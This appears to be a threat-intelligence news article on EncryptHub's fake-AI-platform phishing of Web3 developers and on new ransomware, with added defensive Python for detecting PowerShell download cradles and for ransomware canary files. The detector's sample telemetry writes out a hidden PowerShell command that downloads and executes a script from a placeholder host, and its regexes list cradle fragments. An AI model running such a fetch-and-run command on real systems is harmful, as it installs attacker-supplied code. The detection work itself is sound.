EncryptHub Targets Web3 Developers with Information Stealer Malware
Overview of the Threat Actor
A financially motivated group tracked as EncryptHub (also known as LARVA-208 and Water Gamayun) has launched a campaign aimed squarely at Web3 developers, infecting them with information-stealer malware. Swiss cybersecurity firm PRODAFT, which documented the activity, describes the new targeting as a notable shift in the group's tactics.
Tactics and Techniques
EncryptHub's recent operations are built around fake artificial-intelligence platforms. One of them, Norlax AI, imitates the legitimate service Teampilot. The group uses these sites to lure developers with job offers and requests to review their portfolios.
EncryptHub has a history of deploying ransomware; with this campaign it adds another revenue stream, using information-stealing malware to go after cryptocurrency wallets and sensitive development data. The move mirrors a broader criminal shift toward stealing data from high-value individuals and organizations in the cryptocurrency sector.
Targeting Web3 Developers
The appeal of Web3 developers as targets is clear. They typically hold cryptocurrency wallets and have access to smart-contract repositories and sensitive test environments. Many work independently or across several decentralized projects, outside any single organization's security controls, which makes them harder to protect and easier to single out.
Developers in the Web3 and blockchain space are increasingly receiving phishing messages that steer them to these fake AI platforms. The links arrive under the pretext of a job interview or a portfolio review, building enough trust for the rest of the attack to proceed.
Phishing Methods Used
The attackers send bogus meeting links over platforms such as X and Telegram, framed as a job discussion or portfolio critique so that developers are more likely to click. Notably, to sidestep security warnings on job boards such as Remote3, they start the conversation on a legitimate service such as Google Meet and only later move the victim over to their fraudulent Norlax AI site.
On the fake platform the victim is asked to enter an email address and an invitation code. They are then shown a fabricated error about a missing or outdated audio driver, and that error is the vehicle for delivering the malware.
Malware Deployment
Following the bogus error prompt, the developer downloads a malicious installer posing as a Realtek HD Audio Driver. It runs PowerShell commands that fetch and execute Fickle Stealer, an information stealer built to harvest sensitive data. Once running, the stealer sends what it collects to a server tracked as SilentPrism.
According to PRODAFT, the operation reflects a wider trend in which attackers use fake AI applications to harvest sensitive data, including credentials and cryptocurrency wallet data, for later sale or abuse on illicit markets.
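A detection-side illustration of the chain just described, added here as an example rather than code from PRODAFT or from the campaign: the telltale sequence is a freshly downloaded executable posing as an audio driver that spawns PowerShell with a download-and-execute cradle. The script scores constructed, Sysmon-style process-creation records (Image, ParentImage, CommandLine). The file name RealtekHDAudioDriver_Setup.exe, the host stage.example.invalid, the paths and the lure-name regex are assumptions made for this example, not observed indicators.

```python
"""Added example (not PRODAFT's or EncryptHub's code): flag the process chain the
article describes, a fake audio-driver installer spawning PowerShell with a
download-and-execute cradle. All events below are constructed, Sysmon Event ID 1
style records; names, paths and hosts are invented for the example."""
import re
from pathlib import PureWindowsPath

# PowerShell download-cradle and evasion fragments commonly seen in stagers.
CRADLE_PATTERNS = [re.compile(p, re.I) for p in (
    r"downloadstring\(", r"downloadfile\(", r"invoke-webrequest", r"\biwr\b",
    r"invoke-expression", r"\biex\b", r"-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}",
    r"frombase64string", r"-w(indowstyle)?\s+hidden",
)]
# Directories a browser download lands in and any user can write to.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(downloads|appdata\\local\\temp)\\", re.I)
# Hypothetical lure-name heuristic: binaries posing as an audio driver package.
DRIVER_LURE = re.compile(r"(realtek|hd[ _-]?audio|audio[ _-]?driver)", re.I)
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def reasons_for(evt: dict) -> list[str]:
    """Return the suspicious traits one event exhibits (empty list if none)."""
    out = []
    cmd = evt.get("CommandLine", "")
    if basename(evt["Image"]) in POWERSHELL and any(p.search(cmd) for p in CRADLE_PATTERNS):
        out.append("powershell download/execute cradle")
    parent = evt.get("ParentImage", "")
    if USER_WRITABLE.search(parent):
        out.append("parent launched from user-writable download/temp dir")
    if DRIVER_LURE.search(basename(parent)):
        out.append("parent name mimics an audio driver installer")
    return out


def detect(events: list[dict]) -> list[dict]:
    """Alert only when a cradle is present AND the parent looks like a dropped lure.
    A cradle alone (admins use Invoke-WebRequest too) or a Downloads-dir parent
    alone (every installer) is too noisy on its own; the combination is rare."""
    alerts = []
    for evt in events:
        r = reasons_for(evt)
        if "powershell download/execute cradle" in r and len(r) >= 2:
            alerts.append({"RecordId": evt["RecordId"],
                           "ParentImage": evt["ParentImage"], "reasons": r})
    return alerts


# Constructed sample telemetry: the installer name, user, paths and host are made up.
SAMPLE_EVENTS = [
    {"RecordId": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Users\dev\Downloads\RealtekHDAudioDriver_Setup.exe",
     "CommandLine": r'"C:\Users\dev\Downloads\RealtekHDAudioDriver_Setup.exe"'},
    {"RecordId": 2, "ParentImage": r"C:\Users\dev\Downloads\RealtekHDAudioDriver_Setup.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "
                    "\"IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/s.ps1')\""},
    {"RecordId": 3, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\src\build.ps1"},
    {"RecordId": 4, "ParentImage": r"C:\Program Files\Git\git-bash.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command \"Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip\""},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Only record 2 fires: it carries a cradle, its parent sits in the user's Downloads folder, and the parent's name mimics a driver installer. Record 4 also contains a download cradle but has a legitimate parent, so it is reported by reasons_for but never promoted to an alert; requiring two independent signals is what keeps a rule like this usable on a developer workstation where PowerShell downloads are routine.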
Evolving Cyber Threats
Separately, a new ransomware family named KAWA4096 has surfaced. It borrows stylistic elements from established groups such as Akira and Qilin, apparently to trade on their notoriety and raise its own profile.
KAWA4096, first seen in June 2025, has already hit multiple companies, mostly in the United States and Japan. It is multithreaded and encrypts files across shared network drives, which lets it work through a large number of files quickly.
Sophisticated Ransomware Techniques
Its efficiency comes from a work-queue design: valid target files are placed on a processing queue that worker threads drain, each thread encrypting files in parallel. Security analysts Nathaniel Morales and John Basmayor describe how these threads work in concert to keep the encryption pipeline busy, a sign of how carefully engineered modern ransomware has become.
Another ransomware operation, Crux, has also emerged. It claims affiliation with the BlackByte group and was observed in incidents throughout July 2025, relying chiefly on legitimate Windows tools (living-off-the-land binaries) to carry out its activity.
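As an added defensive example (not KAWA4096's code and not the analysts' own tooling), the check below plants decoy files and flags them once they are rewritten with high-entropy content, which is exactly what a worker-thread encryptor sweeping a share leaves behind regardless of family. The decoy names, the 4 KB canary text and the 7.0 bits-per-byte threshold are choices made for this example; simulate_encryptor is a constructed stand-in that only overwrites the decoys with random bytes so the check can be exercised.

```python
"""Added example, not code from KAWA4096 or from Trustwave's analysts: canary files
as a content-based tripwire for mass encryption. Text files sit at roughly 4-5
bits/byte of Shannon entropy; ciphertext approaches 8, so a decoy whose bytes
jump above a threshold (or that vanishes) is a strong signal. Thresholds, names
and the simulated encryptor are assumptions made for this example."""
import math
import os
import tempfile
from pathlib import Path

CANARY_TEXT = b"quarterly-report draft\n" * 180   # ~4 KB of low-entropy, plausible content
ENTROPY_LIMIT = 7.0                                # bits/byte; chosen for the example


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; 0.0 for empty or single-symbol input."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def plant_canaries(root: Path, count: int = 3) -> dict[Path, bytes]:
    """Write decoys and return the baseline content to compare against later."""
    baseline = {}
    for i in range(count):
        p = root / f"~$budget_{i}.xlsx"   # hypothetical name, chosen to look like an Office temp file
        p.write_bytes(CANARY_TEXT)
        baseline[p] = CANARY_TEXT
    return baseline


def check_canaries(baseline: dict[Path, bytes]) -> list[str]:
    """Return one finding per canary that is gone, renamed or rewritten."""
    findings = []
    for p, original in baseline.items():
        if not p.exists():
            findings.append(f"{p.name}: missing or renamed")
            continue
        data = p.read_bytes()
        if data == original:
            continue
        h = shannon_entropy(data)
        if h >= ENTROPY_LIMIT:
            findings.append(f"{p.name}: rewritten with high-entropy content ({h:.2f} bits/byte)")
        else:
            findings.append(f"{p.name}: modified ({h:.2f} bits/byte)")
    return findings


def simulate_encryptor(root: Path) -> None:
    """Constructed stand-in for an in-place encryptor: replace every file's
    contents with random bytes. Not malware; it exists only to drive the check."""
    for p in root.iterdir():
        if p.is_file():
            p.write_bytes(os.urandom(len(CANARY_TEXT)))


def demo() -> tuple[list[str], list[str]]:
    """Plant decoys, check them (clean), overwrite them, check again (alerts)."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        baseline = plant_canaries(root)
        before = check_canaries(baseline)
        simulate_encryptor(root)
        after = check_canaries(baseline)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("before:", before)
    print("after:", after)
```

In practice the decoys go at the top of each share a worker-thread encryptor would enumerate, and check_canaries runs on a short timer from a host the share is mounted on; because the check compares bytes rather than file names, it also catches encryptors that keep the original extension.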
Conclusion
The EncryptHub campaign and the new ransomware strains show how quickly threats against the cryptocurrency sector evolve. Recognizing the phishing pretexts described here (an unsolicited interview or portfolio-review invitation that ends on an unfamiliar platform, and a meeting site that asks you to install a driver before you can join) is the first line of defense, and keeping wallet keys and repository credentials off everyday development workstations limits what a stealer can take when that line fails. Given the stakes, sustained vigilance and proactive defenses remain essential.


